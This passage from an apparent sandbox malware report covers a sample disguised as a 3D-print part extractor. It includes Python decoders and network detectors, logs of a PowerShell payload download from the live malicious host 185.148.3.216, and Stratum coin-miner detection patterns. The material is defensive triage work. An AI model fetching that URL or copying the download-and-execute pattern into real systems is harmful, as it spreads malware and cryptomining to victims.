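        "030000009F7DFD23AAB7D8010FF3C204FC7EDB010000000000000000FB2DCF09FC7EDB01",
}


def filetime_to_datetime(ft):
    """FILETIME counts 100 ns ticks since 1601-01-01 UTC; zero means 'never'."""
    if ft == 0:
        return None
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def decode_dynamic_info(hex_value):
    """Assumed version-3 layout (36 bytes, little-endian):
    uint32 version | FILETIME registered | FILETIME last start |
    uint32 state | uint32 last error | FILETIME last successful completion."""
    raw = bytes.fromhex(hex_value)
    if len(raw) != 36:
        raise ValueError(f"expected 36 bytes, got {len(raw)}")
    version, registered, started, state, last_error, completed = struct.unpack("<IQQIIQ", raw)
    return {
        "version": version,
        "registered": filetime_to_datetime(registered),
        "last_start": filetime_to_datetime(started),
        "state": state,
        "last_error": last_error,
        "last_completed": filetime_to_datetime(completed),
    }


def summarize(analysis_start=ANALYSIS_START):
    """Decode every write and flag tasks registered well before the run: those
    are pre-existing tasks being triggered, not persistence the sample added."""
    rows = []
    for task_id, hex_value in TASKCACHE_WRITES.items():
        info = decode_dynamic_info(hex_value)
        info["task_id"] = task_id
        info["pre_existing"] = info["registered"] < analysis_start - timedelta(days=1)
        info["started_after_analysis_start"] = info["last_start"] >= analysis_start
        rows.append(info)
    return rows


if __name__ == "__main__":
    for row in summarize():
        print(row["task_id"], "registered", row["registered"], "last start", row["last_start"],
              "pre-existing" if row["pre_existing"] else "new")
```

Decoded under that layout, both entries were registered long before the run (February 2024 and August 2022) and last started a few seconds after the analysis date, so these two writes record existing tasks firing during the analysis rather than the tasks the sample registered through schtasks.exe; those registrations are not among the excerpted events and have to be pulled from the full report. When triaging a real TaskCache hive the same check (registration time versus the incident window, plus a last-error of 0 meaning the action ran) is what separates persistence the attacker added from noise.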
Executable files: 9
Suspicious files: 61
Text files: 36
Unknown types: 0

Dropped files

PID | Process | Filename | Type
6172 | Extract 3D Print Part All.exe | C:\Users\admin\AppData\Local\Temp\auto14.bat | text
    MD5: 13314406B39C2CD68C21F73FB5142E75
    SHA256: 216CF8A41A1A8A76E53AEEA94F5DBC090B7302656AA44B46360CA8BD1D65C0E5
6172 | Extract 3D Print Part All.exe | C:\Users\admin\AppData\Local\Temp\bolt_25x8.stl | text
    MD5: 43772B7013656C84EF5E7A69E830F0CE
    SHA256: 0C3427A2F023F4DE599ABE1CDA57F299535B395CD56CF8DFE3E61BF5840AC0B7
4488 | explorer.exe | C:\Users\admin\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat | binary
    MD5: E49C56350AEDF784BFE00E444B879672
    SHA256: A8BD235303668981563DFB5AAE338CB802817C4060E2C199B7C84901D57B7E1E
6172 | Extract 3D Print Part All.exe | C:\Users\admin\AppData\Local\Temp\washer_1_x_8.5.stl | text
    MD5: A1E7F53CED2F9B191CF640D378CFBF47
    SHA256: 3D4BA8534F8D20736B3BB956E5141113B60391F6D7224620A88333A1C18253AE
1768 | svchost.exe | C:\Windows\Prefetch\EXTRACT 3D PRINT PART ALL.EXE-C687B749.pf | binary
    MD5: 274A80858C0364255B9A63AFF5B10318
    SHA256: 3D0D09663C287862DA245CE3B102C73A47300BD7D25ECA6439E478157C8E7B4C
5164 | dllhost.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\WebCache\V01.chk | binary
    MD5: 9628937F1D0F7449C2BB18557D32ABBC
    SHA256: B4F5910E457A3718E24C74BC67529F799CE881225673F938E9462A76F90C40C3
6172 | Extract 3D Print Part All.exe | C:\Users\admin\AppData\Local\Temp\wingnut_6x9.stl | text
    MD5: 09A76AB0D924B97201AEC851C2C589CC
    SHA256: 3B7FCAE304933F6FAAB1DE4218476FB439287E035EAA94247B72F0DF1285D278
6172 | Extract 3D Print Part All.exe | C:\Users\admin\AppData\Local\Temp\Nut_Job.scad | text
    MD5: 97C6A47E07BD92F7236C783D40053793
    SHA256: 1623961BB2F76E2EBD3685377A9D94ECC5ACB95C7B3451A5575F93F8BBAA7C42
6172 | Extract 3D Print Part All.exe | C:\Users\admin\AppData\Local\Temp\NutJoiner18x9.stl | text
    MD5: 8FA949B46484C44508E10E250ACBD7E2
    SHA256: A3BA0B63FEB4E766E3B214ED53D911198C2DB44CA6431175DC6D4588EC7FE22D
1768 | svchost.exe | C:\Windows\Prefetch\NET.EXE-DF44F913.pf | binary
    MD5: 79F497C83C7A4BD9C5234D1DF2D1DE55
    SHA256: 03655BE0B5900A57D2878976A40092154872F684C1D2FDEC0CB8A2858C49564B

This is the first page of the dropped-file list (the counts above give 106 files in total). The .stl and .scad files the sample unpacks into Temp match the 3D-print theme of its file name; auto14.bat, written by the same process, is the batch script that the "Executing commands from a .bat file" indicator attributes to the sample and cmd.exe (PID 6272). The prefetch and WebCache entries are written by Windows itself.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 10
TCP/UDP connections: 68
DNS requests: 18
Threats: 6

HTTP requests

(The Type and Size columns were empty in the extracted report. A dash marks a field the report left blank.)

PID | Process | Method | HTTP code | IP | URL | CN | Reputation
4712 | MoUsoCoreWorker.exe | GET | 200 | 23.48.23.180:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
2508 | svchost.exe | GET | 200 | 23.48.23.180:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.19.217.218:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
2508 | svchost.exe | GET | 200 | 2.19.217.218:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
- | - | GET | 200 | 23.67.160.244:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | whitelisted
1176 | svchost.exe | GET | 200 | 23.67.160.244:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
6644 | powershell.exe | GET | 200 | 185.148.3.216:80 | http://185.148.3.216/Okfgjrg5d8gt | unknown | malicious
6192 | SIHClient.exe | GET | 200 | 92.123.22.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
6560 | backgroundTaskHost.exe | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | whitelisted
6192 | SIHClient.exe | GET | 200 | 92.123.22.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted

Only the powershell.exe (PID 6644) request to the bare IP 185.148.3.216 is attacker traffic; the rest is CRL and OCSP fetching by Windows components. That request is the one the Threats section below flags as a PE download from a dotted-quad host, and its path matches the Okfgjrg5d8gt.exe (PID 2676) that the indicators above show being executed from the Public directory.

Connections

(First rows only; the summary above counts 68 TCP/UDP connections. A dash marks a field the report left blank.)

PID | Process | IP | Domain | ASN | CN | Reputation
- | - | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4712 | MoUsoCoreWorker.exe | 23.48.23.180:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
2508 | svchost.exe | 23.48.23.180:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
4712 | MoUsoCoreWorker.exe | 2.19.217.218:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted
2508 | svchost.exe | 2.19.217.218:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 23.212.110.200:443 | www.bing.com | Akamai International B.V. | CZ | whitelisted
- | - | 23.67.160.244:80 | ocsp.digicert.com | AKAMAI-AS | JP | whitelisted
1176 | svchost.exe | 20.190.160.65:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
1176 | svchost.exe | 23.67.160.244:80 | ocsp.digicert.com | AKAMAI-AS | JP | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 51.104.136.2
whitelisted
crl.microsoft.com
  • 23.48.23.180
  • 23.48.23.177
  • 23.48.23.145
  • 23.48.23.159
  • 23.48.23.176
  • 23.48.23.167
  • 23.48.23.156
  • 23.48.23.164
  • 23.48.23.194
whitelisted
www.microsoft.com
  • 2.19.217.218
  • 92.123.22.101
whitelisted
google.com
  • 142.250.186.110
whitelisted
www.bing.com
  • 23.212.110.200
  • 23.212.110.209
  • 23.212.110.219
  • 23.212.110.201
  • 23.212.110.208
  • 23.212.110.217
  • 23.212.110.187
  • 23.212.110.136
  • 23.212.110.137
whitelisted
ocsp.digicert.com
  • 23.67.160.244
  • 2.23.77.188
whitelisted
login.live.com
  • 20.190.160.65
  • 40.126.32.68
  • 20.190.160.131
  • 20.190.160.17
  • 20.190.160.66
  • 40.126.32.134
  • 20.190.160.14
  • 40.126.32.140
whitelisted
go.microsoft.com
  • 23.35.238.131
whitelisted
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
whitelisted

Threats

PID | Process | Class | Message
6644 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
6644 | powershell.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP
6644 | powershell.exe | Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
7208 | dialer.exe | Crypto Currency Mining Activity Detected | ET COINMINER W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message (three identical alerts)
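The two attacker-side alerts above key on protocol content: the dialer.exe hits fire on a Stratum subscribe/authorize message to a mining pool, and the powershell.exe hit fires when an HTTP response from a bare-IP host begins with the PE "MZ" signature. As an added example (not the Suricata rules themselves, whose exact logic is not on this page), the Python below implements both checks over raw TCP payloads and pulls out the pool login identity, which is the most durable indicator a miner leaks. The payloads are constructed: the IP and URL path in the HTTP request are the ones this report shows powershell.exe fetching, while the Stratum messages, the User-Agent string and the response body are assumed.

```python
"""Network detections mirroring the Suricata alerts in the Threats table:
Stratum mining-pool JSON-RPC, and a PE (MZ) body served by an IP-literal HTTP
host. Added example; the payloads below are constructed, not from the PCAP."""
import json
import re

# Stratum v1 method names, plus the "login" form the XMRig/Monero pool protocol uses.
STRATUM_METHODS = {"mining.subscribe", "mining.authorize", "mining.submit", "login"}
DOTTED_QUAD_HOST = re.compile(rb"^Host:\s*(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?\s*$", re.I | re.M)


def stratum_messages(payload):
    """Stratum is newline-delimited JSON-RPC; return (method, params) for every
    line that parses as a request carrying a known mining method."""
    found = []
    for line in payload.split(b"\n"):
        line = line.strip()
        if not line.startswith(b"{"):
            continue
        try:
            msg = json.loads(line)
        except ValueError:
            continue
        if isinstance(msg, dict) and msg.get("method") in STRATUM_METHODS:
            found.append((msg["method"], msg.get("params")))
    return found


def is_stratum_subscribe_or_authorize(payload):
    """What 'Subscribe/Authorize Stratum Protocol Message' keys on."""
    return any(m in ("mining.subscribe", "mining.authorize", "login")
               for m, _ in stratum_messages(payload))


def miner_identity(payload):
    """The worker or wallet string the miner logs in with: the most durable
    indicator a pool login leaks, and worth pivoting on across hosts."""
    for method, params in stratum_messages(payload):
        if method == "mining.authorize" and isinstance(params, list) and params:
            return str(params[0])
        if method == "login" and isinstance(params, dict):
            return params.get("login")
    return None


def dotted_quad_mz_download(request, response):
    """True when an HTTP request to an IP-literal Host got a body that starts
    with the PE 'MZ' signature (what 'Dotted Quad Host MZ Response' keys on)."""
    head, sep, body = response.partition(b"\r\n\r\n")
    if not sep or not head.startswith(b"HTTP/1."):
        return False
    return bool(DOTTED_QUAD_HOST.search(request)) and body[:2] == b"MZ"


# Constructed samples. The IP and path in the HTTP request are the ones the
# report shows powershell.exe fetching; everything else is assumed.
SAMPLE_STRATUM = (
    b'{"id":1,"method":"mining.subscribe","params":["cpuminer/2.5.1"]}\n'
    b'{"id":2,"method":"mining.authorize","params":["WALLET.worker1","x"]}\n'
)
SAMPLE_XMR_LOGIN = (
    b'{"id":1,"jsonrpc":"2.0","method":"login",'
    b'"params":{"login":"WALLET","pass":"x","agent":"XMRig/6.21.0"}}\n'
)
SAMPLE_HTTP_REQUEST = (
    b"GET /Okfgjrg5d8gt HTTP/1.1\r\nHost: 185.148.3.216\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1\r\n\r\n"
)
SAMPLE_HTTP_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n\r\n"
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"  # start of a DOS header
)

if __name__ == "__main__":
    print("stratum:", stratum_messages(SAMPLE_STRATUM), "identity:", miner_identity(SAMPLE_STRATUM))
    print("xmr login identity:", miner_identity(SAMPLE_XMR_LOGIN))
    print("dotted-quad MZ download:", dotted_quad_mz_download(SAMPLE_HTTP_REQUEST, SAMPLE_HTTP_RESPONSE))
```

Two caveats carry over from the report itself. The Stratum check only sees plaintext pools; the "Connects to unusual port" indicator on dialer.exe (PID 7208) is the fallback signal when the pool connection is TLS-wrapped and the JSON never appears on the wire. And the dotted-quad check depends on the download being plain HTTP, which it was here; the same fetch over HTTPS would leave only the bare-IP SNI-less connection and the PowerShell User-Agent, if that, to alert on.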
No debug info